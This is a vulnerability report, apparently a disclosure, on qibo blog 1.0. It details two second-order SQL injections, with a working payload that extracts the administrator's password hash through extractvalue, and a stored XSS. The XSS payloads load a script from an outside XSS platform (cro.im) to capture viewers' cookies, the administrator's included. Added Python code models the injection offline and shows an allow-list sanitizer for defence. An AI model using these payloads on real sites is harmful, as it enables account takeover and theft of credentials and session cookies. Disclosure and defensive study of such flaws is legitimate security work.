### Brief description:
The blog system is a public blogging platform along the lines of Blogbus (博客大巴).
Two high-risk SQL injections plus one stored XSS that can be used to hit the administrator account.
Affects the latest release, blog 1.0:
http://down.qibosoft.com/down.php?v=blog1.0
### Details:
http://localhost/qibo/bk/blog/member/postlog.php?job=postlog
Register as an ordinary member, then publish a log entry.
Injection one
Offending code: \blog\member\postlog.php
```
if($job=="postlog")
{
    if($step==2){
        if(!$title){
            showerr("标题不能为空");      // title must not be empty
        }elseif(!$content){
            showerr("内容不能为空");      // content must not be empty
        }
        if($file_db){
            foreach( $file_db AS $key=>$value){
                if((eregi("jpg$",$value)||eregi("gif$",$value))&&!eregi("sysimage\/file",$value)){
                    $picurl=$value;
                    break;
                }
            }
        }
        if($picurl&&($webdb[if_gdimg]))
        {
            $smallpic="$picurl.gif";
            $Newpicpath=ROOT_PATH."$webdb[updir]/$smallpic";
            gdpic(ROOT_PATH."$webdb[updir]/$picurl",$Newpicpath,200,150);
            if( file_exists($Newpicpath) )
            {
                $picurl="$smallpic";
            }
            $ispic=1;
        }
        // $albumname was populated by extract() from the album row (see below) and is
        // interpolated here without escaping; $content and $passwd come straight from
        // the request and have no length limit.
        $db->query("INSERT INTO `{$pre}blog_log_article` (`title`, `albumid`, `albumname`, `fid`, `fname`, `posttime`, `list`, `uid`, `username`,`picurl`, `ispic`, `yz`, `keywords`, `ishtml`, `ip`,`content`,passwd,viewtype) VALUES ('$title','$albumid','$albumname','$fid','$fname','$timestamp','$timestamp','$lfjuid','$lfjid','$picurl','$ispic','$yz','$keywords','1','$onlineip','$content','$passwd','$viewtype')");
        @extract($db->get_one("SELECT * FROM `{$pre}blog_log_article` ORDER BY id DESC LIMIT 1"));
        refreshto("list.php?type=log&job=list","<a href='../index.php?file=viewlog&uid=$lfjuid&id=$id' target='_blank'>查看效果</a> <a href='list.php?type=log&job=list'>返回列表</a> <a href='?job=$job'>继续发表</a>",600);
```
![fenlei.png: the category (album) selector on the post form](https://images.seebug.org/upload/201502/07131720a4900af5ef6959858098d98fe57b151b.png)
`$albumname` is not taken from the request: it is read back from the album table (code below) and spliced into the INSERT above without escaping. A name that was escaped on the way into the database comes back out raw, so this is a second-order SQL injection.
```
// Runs before the INSERT above: create a new album, or look an existing one up.
if($albumid==-1)
{
    if(strlen($newalbum)>30)
    {
        showerr("分类名称不能大于30个字符");   // album name may not exceed 30 characters: the only check
    }
    elseif($newalbum=='')
    {
        $newalbum="新分类";
    }
    $db->query("INSERT INTO `{$pre}$table_type` ( `name` , `uid` , `list`) VALUES ('$newalbum', '$lfjuid', '$timestamp')");
    // The stored name is read straight back and becomes $albumname via extract(),
    // with whatever escaping it had on the way in now gone.
    @extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` ORDER BY id DESC LIMIT 1"));
}
elseif($albumid)
{
    @extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` WHERE id='$albumid' "));
}
```
The album name is capped at 30 characters, though:
```
if(strlen($newalbum)>30)
```
But `content` and `passwd`, which come later in the same VALUES list, have no length limit and are fully attacker-controlled. The album name only has to close the string and open a comment (`a'/*`); the `content` field closes that comment (`*/`) and supplies the rest of the VALUES list, so every fixed value between the two points is commented out and the attacker owns the tail of the statement.
Using comments across the two input points in this way, we extract the administrator's password.
Create a new category named `a'/*`; once it exists, fill `content` as shown:
![the content field filled with the payload](https://images.seebug.org/upload/201502/07133238796d970f1bd3f445b38509334854a99e.png)
The content field comes with two line breaks by default, and a line break terminates the `#` comment (anything after it is live SQL again, which breaks the statement). Submit the form, intercept it in Burp and strip the line breaks from the request:
![qudiao.png: the line breaks removed in Burp](https://images.seebug.org/upload/201502/071338516f57ec1f8b0f7f076c5b2deab650d506.png)
```
content=*/,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+and+extractvalue(1,+concat(0x5c,(select+password+from+qb_members+limit+0,1))))#
```
![sucessu.png: the administrator's password hash returned in the extractvalue error](https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png)
Injection two is the same pattern, in blog\member\postphoto.php:
```
// Same album handling as in postlog.php; the photo INSERT that follows splices
// $albumname in unescaped in exactly the same way.
if($albumid==-1)
{
    if(strlen($newalbum)>30)
    {
        showerr("分类名称不能大于30个字符");   // album name may not exceed 30 characters
    }
    elseif($newalbum=='')
    {
        $newalbum="新分类";
    }
    $db->query("INSERT INTO `{$pre}$table_type` ( `name` , `uid` , `list`) VALUES ('$newalbum', '$lfjuid', '$timestamp')");
    @extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` ORDER BY id DESC LIMIT 1"));
}
elseif($albumid)
{
    @extract($db->get_one("SELECT id AS albumid,name AS albumname FROM `{$pre}$table_type` WHERE id='$albumid' "));
}
```
The problem is identical, so it is not walked through a second time.
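What the two inputs do to the statement, as an added example written for this page (it is not qibo's code). It assumes that request parameters are escaped addslashes()-style before they reach the query, which is why the real payload contains no quotes; the column list, the stored-name round trip and the `#` / `/* */` handling follow the postlog.php snippets above. postphoto.php differs only in its column list, so `build_content_payload` takes the list as a parameter rather than hard-coding fifteen ones. Nothing here connects to MySQL: the point is to see the statement the server would actually execute, and to see that a newline left in `content` leaves live text after the `#` comment.

```python
"""Second-order SQL injection in qibo blog 1.0 postlog.php, modelled offline.
Added example, not the project's code. Assumed: request parameters are escaped
addslashes()-style before reaching the query (the real payload avoids quotes)."""
import re

# Column order of the INSERT in postlog.php (18 columns).
COLUMNS = ["title", "albumid", "albumname", "fid", "fname", "posttime", "list",
           "uid", "username", "picurl", "ispic", "yz", "keywords", "ishtml",
           "ip", "content", "passwd", "viewtype"]
# Error-based extraction expression from the page's payload (qb_ is the prefix).
ADMIN_HASH_EXPR = ("extractvalue(1,concat(0x5c,"
                   "(select password from qb_members limit 0,1)))")


def addslashes(s):
    """PHP addslashes(): what every request value is assumed to pass through."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def create_album(newalbum):
    """Step 1: the album INSERT. The only check is length; MySQL consumes the
    escaping backslashes, so the stored name is the raw input again."""
    if len(newalbum) > 30:
        raise ValueError("album name longer than 30 chars")
    return re.sub(r"\\(.)", r"\1", addslashes(newalbum), flags=re.S)


def postlog_insert(request, stored_albumname):
    """Step 2: the article INSERT. Request fields are escaped, but albumname
    comes back from the DB via extract() and is spliced in untouched."""
    row = {c: "x" for c in COLUMNS}            # server-set values, not ours
    row.update({k: addslashes(v) for k, v in request.items()})
    row["albumname"] = stored_albumname         # unescaped: second-order
    cols = ",".join("`%s`" % c for c in COLUMNS)
    vals = ",".join("'%s'" % row[c] for c in COLUMNS)
    return "INSERT INTO `qb_blog_log_article` (%s) VALUES (%s)" % (cols, vals)


def strip_comments(sql):
    """Drop /* */ and # comments outside string literals like MySQL's lexer.
    A # comment ends at the newline, not at the end of the statement."""
    out, i, in_str = [], 0, False
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\":                       # escaped char inside a literal
                out.append(sql[i:i + 2]); i += 2; continue
            in_str = c != "'"
        elif c == "'":
            in_str = True
        elif sql.startswith("/*", i):
            j = sql.find("*/", i + 2); i = len(sql) if j < 0 else j + 2; continue
        elif c == "#":
            j = sql.find("\n", i); i = len(sql) if j < 0 else j; continue
        out.append(c); i += 1
    return "".join(out)


def values_tuple(sql):
    """Split VALUES (...) at top-level commas; return (items, text after ')')."""
    i = sql.index("VALUES (") + len("VALUES (")
    items, cur, depth, in_str = [], [], 0, False
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\":
                cur.append(sql[i:i + 2]); i += 2; continue
            in_str = c != "'"
        elif c == "'":
            in_str = True
        elif c == "(":
            depth += 1
        elif c == ")" and depth == 0:
            items.append("".join(cur).strip())
            return items, sql[i + 1:].strip()
        elif c == ")":
            depth -= 1
        elif c == "," and depth == 0:
            items.append("".join(cur).strip()); cur = []; i += 1; continue
        cur.append(c); i += 1
    raise ValueError("unterminated VALUES list")


def build_content_payload(columns, expr):
    """Close the comment the album name opened, supply one value per remaining
    column with expr riding on the last, close VALUES, and let '#' eat the
    template's tail. postphoto.php only differs in its column list."""
    remaining = len(columns) - columns.index("albumname") - 1
    return "*/" + ",1" * (remaining - 1) + ",1 and " + expr + ")#"


def effective_insert(newalbum, content):
    """Both steps end to end: (values, trailing text) of the live statement.
    Non-empty trailing text means MySQL would reject the statement."""
    sql = postlog_insert({"title": "t", "content": content}, create_album(newalbum))
    return values_tuple(strip_comments(sql))
```

With the album named `a'/*` and `content` set to `build_content_payload(COLUMNS, ADMIN_HASH_EXPR)`, `effective_insert` returns exactly 18 values, the third being `'a'` and the last `1 and extractvalue(...)`, with nothing left over after the closing parenthesis; append the editor's `\r\n\r\n` to the same payload and the text after `#` survives the newline, which is the reason the request has to be cleaned up in Burp.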
XSS
In the article body, switch the editor to source-code mode and you can insert XSS directly: only keywords such as `javascript` are crudely filtered out,
which, as we know, is nowhere near enough.
![xss.png: the payload entered in source-code mode](https://images.seebug.org/upload/201502/07134526f4bca912129c9d886ffabdc2b44879f6.png)
The popup fires:
![xssuccess.jpg: alert box in the rendered article](https://images.seebug.org/upload/201502/071345515627c98ed902ca86d21250df0dec7666.jpg)
Either of the following payloads works:
```
<script/src=//cro.im/2B></script>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://cro.im/2B';>
```
![crom1.jpg: the payload stored in the article](https://images.seebug.org/upload/201502/0714043737f03bd03f65a1738a1d33030921bd38.jpg)
Anyone who views the entry, administrator included, loads the XSS platform's hook:
![crom2.png: the hook registered on the platform](https://images.seebug.org/upload/201502/0714051421c3686f50d158a20b401cacf6e44087.png)
and their cookies arrive on the platform.
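The filter the page describes is a keyword blocklist, and the two payloads above contain none of the words such a list would hold, which is why they pass. The following is an added example, not qibo's filter (the page does not show its word list, so `BLOCKED_WORDS` is a guess at its shape), contrasting that approach with an allow-list sanitizer built on the standard library's HTMLParser: tags and attributes not on the list are dropped, every `on*` handler goes regardless of content, `<script>` is dropped together with its text, and URL attributes must be http(s) or relative. In production use a maintained sanitizer (HTML Purifier on the PHP side); this sketch only shows the difference in approach.

```python
"""Keyword blocklist versus allow-list sanitizer for the stored XSS in the
article body. Added example, not qibo's filter: the page only says keywords
such as "javascript" are crudely removed, so BLOCKED_WORDS is a guess at that
shape. For production use a maintained sanitizer (e.g. HTML Purifier)."""
import re
from html import escape
from html.parser import HTMLParser

BLOCKED_WORDS = ("javascript", "vbscript", "expression")      # assumed list

# The two payloads from the page.
PAYLOADS = (
    "<script/src=//cro.im/2B></script>",
    "<img src=x onerror=s=createElement('script');body.appendChild(s);"
    "s.src='http://cro.im/2B';>",
)


def keyword_filter(html):
    """The blocklist approach: delete the bad words and pass everything else."""
    for word in BLOCKED_WORDS:
        html = re.sub(re.escape(word), "", html, flags=re.I)
    return html


ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "img",
                "ul", "ol", "li", "blockquote", "pre", "code"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
VOID_TAGS = {"br", "img"}


def safe_url(value):
    """Allow http(s) and relative URLs only. Whitespace and control characters
    are stripped first because browsers ignore them ('java\\tscript:')."""
    v = re.sub(r"[\x00-\x20]", "", value).lower()
    return v.startswith(("http://", "https://", "/")) or ":" not in v


class AllowlistSanitizer(HTMLParser):
    """Rebuild the document from parsed tokens, keeping only what is listed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skipping = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):          # drop the element and its text
            self.skipping += 1
            return
        if tag not in ALLOWED_TAGS:             # unknown tag: keep text, drop tag
            return
        kept = []
        for name, value in attrs:
            name, value = name.lower(), value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue                        # every event handler ends here
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skipping = max(0, self.skipping - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))


def allowlist_sanitize(html):
    """Return the sanitized markup for one article body."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```

`keyword_filter` returns both payloads unchanged; `allowlist_sanitize` turns the first into an empty string and the second into `<img src="x">`, and a `javascript:` href on an otherwise allowed `<a>` is removed while the link text survives. Protocol-relative image sources such as `//cro.im/2B` are still accepted, which is the right call for an `<img src>` but not for anything that executes.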
### Proof of vulnerability:
Create a new category named `a'/*`; once it exists, fill `content` with the payload below. The content field comes with two line breaks by default and a line break terminates the `#` comment, so intercept the request in Burp and strip them before it goes out.
```
content=*/,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+and+extractvalue(1,+concat(0x5c,(select+password+from+qb_members+limit+0,1))))#
```
![sucessu.png: the administrator's password hash returned in the extractvalue error](https://images.seebug.org/upload/201502/0713383180736f8fedba5a5be21f6bb3ccf6f792.png)
For the XSS, storing either `<script/src=//cro.im/2B></script>` or `<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://cro.im/2B';>` in the article body is enough: whoever views the entry, administrator included, loads the platform hook and their cookies are captured (screenshots under Details above).